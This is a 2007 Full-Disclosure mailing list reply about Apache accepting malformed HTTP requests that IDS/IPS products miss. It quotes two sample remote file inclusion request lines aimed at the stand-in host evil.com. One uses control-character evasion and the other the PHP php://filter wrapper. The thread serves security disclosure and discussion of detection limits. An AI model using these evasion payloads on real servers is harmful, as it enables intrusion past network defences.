[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <1479251011.20070620175055@SECURITY.NNOV.RU>
Date: Wed, 20 Jun 2007 17:50:55 +0400
From: 3APA3A <3APA3A@...URITY.NNOV.RU>
To: "Jamie Riden" <jamie.riden@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: IPS Evasion with the Apache HTTP Server
Dear Jamie Riden,
--Wednesday, June 20, 2007, 4:39:21 PM, you wrote to 3APA3A@...urity.nnov.ru:
JR> (This is what I gathered from the original posting, but I might be wrong.)
JR> I think the issue is not that the apache server behaviour is wrong as
JR> such,
Original BreakingPoint articles author refers to says "The intent is
describe the strange behaviors of network applications". It mentions
neither of IPS products, but IIS and Apache. And at least one case of
Apache behavior is partially expected (because of RFC) and already
described (by Michal Majchrowicz).
JR> but that IDS/IPS do not use the same algorithm as apache for
JR> checking validity of HTTP requests. Thus apache may accept and process
JR> a request like:
JR> \r\n\r\n\r\n\r\n\r\n\x0c/rfi.php?includedir=http://evil.com\x0bHTTP/1.0\r\n\r\n
IPS may detect known attacks. Just like antivirus, you may use IPS to
protected against known viruses/exploits. An ability to bypass IPS with
new one is not a bug. I do collect different content filtering bypassing
methods:
http://securityvulns.com/advisories/content.asp
You simply MUST accept the risk there is always the way to bypass
content filtering. IPS like doesn't protect your network by itself. IPS
is nothing, but a tool.
JR> but that the IDS/IPS will ignore that packet on the grounds that "it's
JR> not a valid HTTP request"., when it should actually be alerting that a
JR> RFI attempt was made.
In this situation IDS/IPS should alert unsupported request attempt was
made and block this attempt in case of IPS.
JR> While we're on the subject of IDS, it looks like PHP 5 supports a new
JR> wrapper php://filter, such that a RFI may be performed by: GET
JR> /rfi.php?includedir=php://filter/resource=http://www.evil.com - which
JR> may not be detected by some existing IDS signatures. (See
JR> http://uk2.php.net/manual/en/wrappers.php.php )
I can write buggy application and attempt to exploit it will never be
detected by existing signatures.
--
~/ZARAZA http://securityvulns.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists